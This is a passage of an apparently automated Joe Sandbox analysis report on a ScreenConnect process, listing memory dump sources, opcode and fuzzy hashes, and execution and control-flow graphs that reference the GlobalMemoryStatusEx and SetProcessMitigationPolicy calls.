                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9850ef57064c8fe78f6cfefc3046e13c8c245d02145dcb0c9604ed0bc3126787
                                                                                    • Instruction ID: 89748fbc46a22bb002cb885dc72854d0294b19bbafa4cc7404025d9c2e6865df
                                                                                    • Opcode Fuzzy Hash: 9850ef57064c8fe78f6cfefc3046e13c8c245d02145dcb0c9604ed0bc3126787
                                                                                    • Instruction Fuzzy Hash: 86A00294E0D9164AE4617D74820157E05495F95600A3051F9E00D955D6CD3CA942119A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: {J$({J$({J$0{J
                                                                                    • API String ID: 0-3959754317
                                                                                    • Opcode ID: 6ea5524e4d670acdb96bd98c907bca7bd1fce5ebadfe49ff258ad055bf18e898
                                                                                    • Instruction ID: d566b3ff7a438683acbc1d991d1c88fb9589f90708fb1df528a6c5e9680043f3
                                                                                    • Opcode Fuzzy Hash: 6ea5524e4d670acdb96bd98c907bca7bd1fce5ebadfe49ff258ad055bf18e898
                                                                                    • Instruction Fuzzy Hash: F45116A2A0DF460BFB99AE78A8559A43BD5EF99314F1801FEE48CC3593DD18AC068341

                                                                                    Execution Graph

                                                                                    Execution Coverage:12%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:10
                                                                                    Total number of Limit Nodes:2
                                                                                    execution_graph 15005 7ffb4ac08b9c 15009 7ffb4ac08baf 15005->15009 15006 7ffb4ac08c68 15007 7ffb4ac08d09 GlobalMemoryStatusEx 15008 7ffb4ac08d35 15007->15008 15009->15006 15009->15007 15010 7ffb4a8f8014 15012 7ffb4a8f801d 15010->15012 15011 7ffb4a8f8082 15012->15011 15013 7ffb4a8f80f6 SetProcessMitigationPolicy 15012->15013 15014 7ffb4a8f8152 15013->15014

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 739 7ffb4ac08b9c-7ffb4ac08bda 742 7ffb4ac08bdc-7ffb4ac08c05 739->742 743 7ffb4ac08c24-7ffb4ac08c36 739->743 745 7ffb4ac08c5e 742->745 746 7ffb4ac08c07-7ffb4ac08c0a 742->746 748 7ffb4ac08cb2-7ffb4ac08cbc 743->748 749 7ffb4ac08c38-7ffb4ac08c3d 743->749 747 7ffb4ac08c5f 745->747 750 7ffb4ac08c8b-7ffb4ac08c8f 746->750 751 7ffb4ac08c0c-7ffb4ac08c0e 746->751 752 7ffb4ac08cdb-7ffb4ac08cde 747->752 753 7ffb4ac08c60 747->753 756 7ffb4ac08cbd 748->756 754 7ffb4ac08cbe-7ffb4ac08cbf 749->754 755 7ffb4ac08c3f-7ffb4ac08c41 749->755 767 7ffb4ac08c90 750->767 757 7ffb4ac08c10 751->757 758 7ffb4ac08c8a 751->758 759 7ffb4ac08ce1-7ffb4ac08d07 752->759 753->759 760 7ffb4ac08c61 753->760 762 7ffb4ac08cc0-7ffb4ac08cc1 754->762 763 7ffb4ac08d09-7ffb4ac08d33 GlobalMemoryStatusEx 754->763 755->756 761 7ffb4ac08c43-7ffb4ac08c47 755->761 756->754 765 7ffb4ac08c12-7ffb4ac08c14 757->765 766 7ffb4ac08c53 757->766 758->750 759->763 770 7ffb4ac08c62-7ffb4ac08c66 760->770 771 7ffb4ac08ca3-7ffb4ac08ca9 760->771 774 7ffb4ac08cc3-7ffb4ac08cc8 761->774 775 7ffb4ac08c49 761->775 762->774 772 7ffb4ac08d3b-7ffb4ac08d62 763->772 773 7ffb4ac08d35 763->773 765->767 768 7ffb4ac08c16 765->768 776 7ffb4ac08ccf-7ffb4ac08cd3 766->776 777 7ffb4ac08c55 766->777 778 7ffb4ac08c18-7ffb4ac08c1a 768->778 779 7ffb4ac08c59 768->779 781 7ffb4ac08c23 770->781 782 7ffb4ac08c68-7ffb4ac08c6d 770->782 783 7ffb4ac08c73-7ffb4ac08c89 771->783 784 7ffb4ac08caa-7ffb4ac08cad 771->784 773->772 786 7ffb4ac08cc9-7ffb4ac08cce 774->786 775->750 785 7ffb4ac08c4b-7ffb4ac08c4d 775->785 780 7ffb4ac08cd5-7ffb4ac08cda 776->780 787 7ffb4ac08c56-7ffb4ac08c57 777->787 788 7ffb4ac08c97-7ffb4ac08c99 777->788 790 7ffb4ac08c1c 778->790 791 7ffb4ac08c96 778->791 779->780 789 7ffb4ac08c5b-7ffb4ac08c5d 779->789 780->752 781->743 782->783 783->758 794 7ffb4ac08cae 784->794 795 7ffb4ac08caf-7ffb4ac08cb1 784->795 785->786 796 7ffb4ac08c4f-7ffb4ac08c51 785->796 786->776 787->779 792 7ffb4ac08c9b-7ffb4ac08c9e 788->792 793 7ffb4ac08c9f 788->793 789->745 790->747 797 7ffb4ac08c1e-7ffb4ac08c21 790->797 791->788 792->793 798 7ffb4ac08ca0-7ffb4ac08ca1 793->798 799 7ffb4ac08ca2 793->799 794->795 795->748 796->766 797->781 797->798 798->799 799->771
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.1703478083.00007FFB4AC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AC00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_7ffb4ac00000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bf16755ddc3b38a13bfb5f317aa60adfd268aa9f47281f235334fd01cbbfb62d
                                                                                    • Instruction ID: dc8c202893ea3a57c6036fc04c218212b07c398458f5eaf6b62a08bec01415f4
                                                                                    • Opcode Fuzzy Hash: bf16755ddc3b38a13bfb5f317aa60adfd268aa9f47281f235334fd01cbbfb62d
                                                                                    • Instruction Fuzzy Hash: B07116B280EA894FE7A5EFB88C055A47FF4EF55310F1581FAD04DD7993DA2868098741

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.1697518885.00007FFB4A8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A8F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_7ffb4a8f0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: MitigationPolicyProcess
                                                                                    • String ID:
                                                                                    • API String ID: 1088084561-0
                                                                                    • Opcode ID: 550f3c866abfb7bae3572bce20036559661bd2a1561b2af15f9ca14af5cae0c3
                                                                                    • Instruction ID: e1d824567f3cb5c5cbe29cdce466f77e729a56371e19544d085cee5d1cdb3063
                                                                                    • Opcode Fuzzy Hash: 550f3c866abfb7bae3572bce20036559661bd2a1561b2af15f9ca14af5cae0c3
                                                                                    • Instruction Fuzzy Hash: 2A41267190CB494FDB15AFB8D84A5F97BE0EF55310F0402BFE489C3292DA78A846CB91